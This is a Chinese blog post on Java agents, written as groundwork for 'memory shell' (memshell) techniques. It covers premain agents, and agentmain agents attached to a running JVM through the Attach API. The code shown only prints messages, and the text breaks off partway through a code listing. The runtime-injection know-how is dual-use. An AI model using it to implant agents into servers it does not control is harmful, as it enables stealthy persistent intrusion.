<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":30,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="记录一下javaAgent的学习">
<meta property="og:type" content="article">
<meta property="og:title" content="javaAgent内存马">
<meta property="og:url" content="http://example.com/2022/04/25/javaAgent%E5%86%85%E5%AD%98%E9%A9%AC/index.html">
<meta property="og:site_name" content="blueSatchel&#39;s blog">
<meta property="og:description" content="记录一下javaAgent的学习">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220425142219666.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426090315058.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426090634611.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426092321902.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426092334442.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426092359077.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426093144597.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426115600828.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426122014335.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426164713688.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426165933108.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/image-20220426220901529.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220427143235362.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220429105814605.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220429110139169.png">
<meta property="article:published_time" content="2022-04-25T05:29:13.000Z">
<meta property="article:modified_time" content="2022-04-29T03:08:04.000Z">
<meta property="article:author" content="blueSatchel">
<meta property="article:tag" content="memshell">
<meta property="article:tag" content="javaAgent">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220425142219666.png">

<link rel="canonical" href="http://example.com/2022/04/25/javaAgent%E5%86%85%E5%AD%98%E9%A9%AC/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>javaAgent内存马 | blueSatchel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">blueSatchel's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/04/25/javaAgent%E5%86%85%E5%AD%98%E9%A9%AC/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/../images/avatar.PNG">
      <meta itemprop="name" content="blueSatchel">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="blueSatchel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          javaAgent内存马
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-04-25 13:29:13" itemprop="dateCreated datePublished" datetime="2022-04-25T13:29:13+08:00">2022-04-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-04-29 11:08:04" itemprop="dateModified" datetime="2022-04-29T11:08:04+08:00">2022-04-29</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/java/" itemprop="url" rel="index"><span itemprop="name">java</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/04/25/javaAgent%E5%86%85%E5%AD%98%E9%A9%AC/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/04/25/javaAgent%E5%86%85%E5%AD%98%E9%A9%AC/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <div class="post-description">记录一下javaAgent的学习</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>在jdk1.5以后,javaAgent是一种能够在不影响正常编译的情况下,修改字节码的技术</p>
<p>java作为一种强类型语言,不通过编译就不能够进行jar包的生成,而有了javaAgent技术,就可以在字节码这个层面对类和方法进行修改,同时,也可以把javaAgent理解成一种代码注入的方式,但是这种注入比起spring的aop更加优美</p>
<p>java agent使用方式</p>
<p>实现<code>premain</code>方法在JVM启动前加载</p>
<p>从字面上理解,就是运行在main函数之前的类,当java虚拟机启动时,在执行main函数之前,JVM会先运行javaAgent所指定jar包内Premain-Class这个类的premain方法</p>
<p>实现<code>agentmain</code>在JVM启动后加载</p>
<p>主要的接口代码在rt.jar java.lang.instrument包下面</p>
<p>实现代码在</p>
<p>JVM会优先加载带<code>Instrumentation</code>签名的方法,加载成功则忽略不带签名的,如果没有带签名的,则加载不带签名的,这个逻辑在<code>InstrumentationImpl</code>中</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220425142219666.png" alt="image-20220425142219666"></p>
<p>Instrumentation接口定义</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">Instrumentation</span> </span>&#123;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">//增加一个Class 文件的转换器，转换器用于改变 Class 二进制流的数据，参数 canRetransform 设置是否允许重新转换。</span></span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">addTransformer</span><span class="params">(ClassFileTransformer transformer, <span class="keyword">boolean</span> canRetransform)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//在类加载之前，重新定义 Class 文件，ClassDefinition 表示对一个类新的定义，如果在类加载之后，需要使用 retransformClasses 方法重新定义。addTransformer方法配置之后，后续的类加载都会被Transformer拦截。对于已经加载过的类，可以执行retransformClasses来重新触发这个Transformer的拦截。类加载的字节码被修改后，除非再次被retransform，否则不会恢复。</span></span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">addTransformer</span><span class="params">(ClassFileTransformer transformer)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//删除一个类转换器</span></span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">removeTransformer</span><span class="params">(ClassFileTransformer transformer)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">isRetransformClassesSupported</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//在类加载之后，重新定义 Class。这个很重要，该方法是1.6 之后加入的，事实上，该方法是 update 了一个类。</span></span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">retransformClasses</span><span class="params">(Class&lt;?&gt;... classes)</span> <span class="keyword">throws</span> UnmodifiableClassException</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">isRedefineClassesSupported</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">redefineClasses</span><span class="params">(ClassDefinition... definitions)</span></span></span><br><span class="line"><span class="function">        <span class="keyword">throws</span>  ClassNotFoundException, UnmodifiableClassException</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">isModifiableClass</span><span class="params">(Class&lt;?&gt; theClass)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@SuppressWarnings(&quot;rawtypes&quot;)</span></span><br><span class="line">    Class[] getAllLoadedClasses();</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line">    <span class="meta">@SuppressWarnings(&quot;rawtypes&quot;)</span></span><br><span class="line">    Class[] getInitiatedClasses(ClassLoader loader);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//获取一个对象的大小</span></span><br><span class="line">    <span class="function"><span class="keyword">long</span> <span class="title">getObjectSize</span><span class="params">(Object objectToSize)</span></span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">   </span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">appendToBootstrapClassLoaderSearch</span><span class="params">(JarFile jarfile)</span></span>;</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">appendToSystemClassLoaderSearch</span><span class="params">(JarFile jarfile)</span></span>;</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">isNativeMethodPrefixSupported</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">setNativeMethodPrefix</span><span class="params">(ClassFileTransformer transformer, String prefix)</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>如何实现一个javaAgent</p>
<p>使用javaAgent需要几个步骤</p>
<p>1.定义一个MANIFEST.MF文件,必须包含Premain-Class选型,通常也会加入Can-Redefine-Classes和Can-Retransform-Classes选项</p>
<p>2.创建一个Premain-Class指定的类,类中包含premain方法,方法逻辑由用户自定确定</p>
<p>3.将premain的类和MANIFEST.MF文件打包成jar包</p>
<p>4.使用参数 -javaagent:jar包路径 启动要代理的方法</p>
<p>在执行以上步骤后,JVM会先执行premain方法,大部分类加载都会通过该方法,注意:是大部分,不是所有.当然,遗漏的主要是系统类,因为很多系统类先于agent执行,而用户类的加载肯东是会被拦截的.也就是说,这个方法是在main方法启动前拦截大部分类的加载活动,既然可以拦截类的加载,那么久可以去做重写类这样的操作,结合第三方的字节码编译工具,比如ASM,javassist,cglib,bytebubby等等来改写实现类</p>
<h4 id="代码实现"><a href="#代码实现" class="headerlink" title="代码实现"></a>代码实现</h4><p>实现javaagent需要搭建两个工程,一个工程师用来承载javaagent类,单独的打成jar包;</p>
<p>一个工程师javaagent需要去代理的类,即javaagent会在这个工程中的main方法启动之前去做一些事情</p>
<h4 id="premain简单实现"><a href="#premain简单实现" class="headerlink" title="premain简单实现"></a>premain简单实现</h4><p>1.新建项目</p>
<p>项目结构如图</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426090315058.png" alt="image-20220426090315058"></p>
<p>没有建立包的原因是为了后面命令行执行的时候方便操作</p>
<p>mainTest文件</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">MainTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;main方法执行!!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>AgentTest文件(内部实现premain方法)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.instrument.Instrumentation;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">AgentTest</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">premain</span><span class="params">(String args, Instrumentation instrumentation)</span><span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;premain agent!!!!&quot;</span>);</span><br><span class="line">        System.out.println(args);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Manifest-Version: <span class="number">1.0</span></span><br><span class="line">Can-Redefine-Classes: <span class="keyword">true</span></span><br><span class="line">Can-Retransform-Classes: <span class="keyword">true</span></span><br><span class="line">Premain-Class: AgentTest</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>将项目以Artifacts模式打包为jar包,(其实主要打包的是premain的类)</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426090634611.png" alt="image-20220426090634611"></p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426092321902.png" alt="image-20220426092321902"></p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426092334442.png" alt="image-20220426092334442"></p>
<p>打包为jar包在out目录下</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426092359077.png" alt="image-20220426092359077"></p>
<p>这个时候不写包名的作用就体现出来了,将刚才打包的jar和javaagent作为参数去运行MainTest</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -javaagent:E:\java\rubbish\test1\out\artifacts\test1_jar\test1.jar MainTest</span><br></pre></td></tr></table></figure>

<p>虽然成功执行了,但是乱码了,很烦</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426093144597.png" alt="image-20220426093144597"></p>
<p>premain的这种方式需要在启动时用<code>-javaagent</code>参数绑定,存在一定的局限性,在实际环境中,目标的JVM通常是已经启动的状态,无法预先加载premain,相比之下,agentmain更加实用</p>
<h3 id="agentmain"><a href="#agentmain" class="headerlink" title="agentmain"></a>agentmain</h3><p>不知道为什么,tools.jar是添加到环境变量中的,但是<code>com.sun.tools.attach</code>还是报红</p>
<p>直接导入外部依赖将tools.jar的真实路径填写,就不报红了</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.sun<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>tools<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.8.0<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">scope</span>&gt;</span>system<span class="tag">&lt;/<span class="name">scope</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">systemPath</span>&gt;</span>D:\environment\jdks\jdk1.8.0_65\lib\tools.jar<span class="tag">&lt;/<span class="name">systemPath</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>写一个<code>agentmain</code>和<code>premain</code>差不多,只需要在<code>META-INF/MANIFEST.MF</code>中加入<code>Agent-Class:</code>即可</p>
<p>不同的是,这种方法不是通过JVM启动前的参数来指定的,官方为了实现启动后加载,提供了<code>Attach API</code>,<code>Attach API</code>很简单,只有2个主要的类,都在<code>com.sun.tools.attach</code>包里面</p>
<p>主要关注抽象类<code>VirtualMachine</code></p>
<p>字面意思就是虚拟机,也就是程序需要监控的目标虚拟机,提供了获取系统信息,它里面提供了获取系统信息、 <code>loadAgent</code>，<code>Attach</code> 和 <code>Detach</code> 等方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 获得当前所有的JVM列表</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> List&lt;VirtualMachineDescriptor&gt; <span class="title">list</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 根据pid连接到JVM</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> VirtualMachine <span class="title">attach</span><span class="params">(String id)</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 断开连接</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">abstract</span> <span class="keyword">void</span> <span class="title">detach</span><span class="params">()</span> </span>&#123;&#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 加载agent，agentmain方法靠的就是这个方法</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">loadAgent</span><span class="params">(String agent)</span> </span>&#123; ... &#125;&#125;</span><br></pre></td></tr></table></figure>

<p>其中list()返回的是一个<code>VirtualMachineDescriptor</code>列表,<code>VirtualMachineDescriptor</code>类其中的成员有下面几个,id应该是jvm对应的pid</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426115600828.png" alt="image-20220426115600828"></p>
<p>所以在使用attach方法前先使用list获取到id</p>
<p>所以大体操作方法还是和premain的差不多,还是通过artifacts-&gt;build打包成jar</p>
<p>项目结构一样</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426122014335.png" alt="image-20220426122014335"></p>
<p>首先把agent打包成jar</p>
<p>写一个有agentmain方法的类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.instrument.Instrumentation;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">AgentMainTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">agentmain</span><span class="params">(String args, Instrumentation instrumentation)</span></span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i&lt;<span class="number">10</span>;i++)&#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;hello I`m agentMain!!!&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>在MF文件中加入Agent-Class即可</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Manifest-Version: <span class="number">1.0</span></span><br><span class="line">Agent-Class: AgentMainTest</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>后面的步骤就比premain的时候简单多了,只需要连接虚拟机,提供代理jar包路径即可运行其中的<code>agantmain</code>方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.tools.attach.VirtualMachine;</span><br><span class="line"><span class="keyword">import</span> com.sun.tools.attach.VirtualMachineDescriptor;</span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">AgentMain</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        <span class="comment">//E:\java\rubbish\agent\out\artifacts\agent_jar\agent.jar</span></span><br><span class="line">        List&lt;VirtualMachineDescriptor&gt; virtualMachineDescriptors = VirtualMachine.list();</span><br><span class="line">        String id=virtualMachineDescriptors.get(<span class="number">1</span>).id();</span><br><span class="line">        <span class="comment">//连接虚拟机</span></span><br><span class="line">        VirtualMachine vm=VirtualMachine.attach(id);</span><br><span class="line">        <span class="comment">//提供代理jar包路径</span></span><br><span class="line">        vm.loadAgent(<span class="string">&quot;E:\\java\\rubbish\\agent\\out\\artifacts\\agent_jar\\agent.jar&quot;</span>);</span><br><span class="line">        vm.detach();</span><br><span class="line">        System.out.println(<span class="string">&quot;ends-------------------&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里有个问题,就是jvm的id需要小猜一下</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426164713688.png" alt="image-20220426164713688"></p>
<h3 id="instrumentation"><a href="#instrumentation" class="headerlink" title="instrumentation"></a>instrumentation</h3><p><code>instrumentation</code>是<code>JVMTIAgent</code> (JVM Tool Interface Agent)的一部分,Java agent通过这个类和目标JVM进行交互,从而达到修改数据的效果</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">Instrumentation</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 增加一个 Class 文件的转换器，转换器用于改变 Class 二进制流的数据，参数 canRetransform 设置是否允许重新转换。在类加载之前，重新定义 Class 文件，ClassDefinition 表示对一个类新的定义，如果在类加载之后，需要使用 retransformClasses 方法重新定义。addTransformer方法配置之后，后续的类加载都会被Transformer拦截。对于已经加载过的类，可以执行retransformClasses来重新触发这个Transformer的拦截。类加载的字节码被修改后，除非再次被retransform，否则不会恢复。</span></span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">addTransformer</span><span class="params">(ClassFileTransformer transformer)</span></span>;</span><br><span class="line">    <span class="comment">// 删除一个类转换器</span></span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">removeTransformer</span><span class="params">(ClassFileTransformer transformer)</span></span>;</span><br><span class="line">    <span class="comment">// 在类加载之后，重新定义 